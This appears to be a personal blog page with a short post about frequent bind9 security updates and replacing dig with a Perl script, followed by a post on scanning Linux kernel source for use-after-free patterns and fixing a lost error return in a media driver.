  • 14 May 2017
    • DSA-3854-1 - bind9
  • 8 July 2017
    • DSA-3904-1 - bind9

So far this year there have been seven months: in three of them nothing happened, but in four of them we had bind9 updates. If these trends continue we'll have another 2.5 updates before the end of the year.

I don't run a nameserver. The only reason I have bind-packages on my system is for the dig utility.

Rewriting a compatible version of dig in Perl should be trivial, thanks to the Net::DNS::Resolver module.

These are about the only commands I ever run:

dig -t a    steve.fi +short
dig -t aaaa steve.fi +short
dig -t a    steve.fi @8.8.8.8

I should do that then. Yes.

| 8 comments

 

That time I didn't find a kernel bug, or did I?

14 August 2019 13:01

Recently I saw a post to the linux kernel mailing-list containing a simple fix for a use-after-free bug. The code in question originally read:

    hdr->pkcs7_msg = pkcs7_parse_message(buf + buf_len, sig_len);
    if (IS_ERR(hdr->pkcs7_msg)) {
        kfree(hdr);
        return PTR_ERR(hdr->pkcs7_msg);
    }

Here the bug is obvious once it has been pointed out:

  • A structure is freed.
    • But then it is dereferenced, to provide a return value.

This is the kind of bug that would probably have been obvious to me if I'd happened to read the code myself. However, a patch was submitted, so job done? I did have some free time, so I figured I'd scan for similar bugs. Writing a trivial Perl script to look for similar things didn't take too long, though it is a bit shoddy:

  • Open each file.
  • If we find a line containing "free(.*)" record the line and the thing that was freed.
  • The next time we find a return look to see if the return value uses the thing that was free'd.
    • If so that's a possible bug. Report it.

Of course my code is nasty, but it looked like it immediately paid off. I found this snippet of code in linux-5.2.8/drivers/media/pci/tw68/tw68-video.c:

    if (hdl->error) {
        v4l2_ctrl_handler_free(hdl);
        return hdl->error;
    }

That looks promising:

  • The structure hdl is freed, via a dedicated freeing-function.
  • But then we return the member error from it.

Chasing down the code I found that linux-5.2.8/drivers/media/v4l2-core/v4l2-ctrls.c contains the implementation of v4l2_ctrl_handler_free, and while it doesn't actually free the structure - just some members - it does reset hdl->error to zero.

Ahah! The code I've found looks for an error, and if one was present it ends up returning zero, meaning the error is lost. I can fix it by changing it to this:

    if (hdl->error) {
        int err = hdl->error;
        v4l2_ctrl_handler_free(hdl);
        return err;
    }

I did that, then looked more closely to see if I was missing something. The code I'd found lives in the function tw68_video_init1; that function is called only once, and its return value is ignored!

So, that's the story of how I scanned the Linux kernel for use-after-free bugs and contributed nothing to anybody.

Still fun though.

I'll go over my list more carefully later, but nothing else jumped out as being immediately bad.

There is a weird case I spotted in ./drivers/media/platform/s3c-camif/camif-capture.c with a similar pattern. In that case the function involved is s3c_camif_create_subdev which is invoked by ./drivers/media/platform/s3c-camif/camif-core.c:

        ret = s3c_camif_create_subdev(camif);
        if (ret < 0)
                goto err_sd;

So I suspect there is something odd there:

  • If there's an error in s3c_camif_create_subdev
    • Then handler->error will be reset to zero.
    • Which means that return handler->error will return 0.
    • Which means that the s3c_camif_create_subdev call should have returned an error, but won't be recognized as having done so.
    • i.e. "0 < 0" is false.

Of course the error-value is only set if this code is hit:

    hdl->buckets = kvmalloc_array(hdl->nr_of_buckets,
                      sizeof(hdl->buckets[0]),
                      GFP_KERNEL | __GFP_ZERO);
    hdl->error = hdl->buckets ? 0 : -ENOMEM;

Which means that the registration of the sub-device fails if there is no memory, and at that point what can you even do?

It's a bug, but it isn't a security bug.

| 2 comments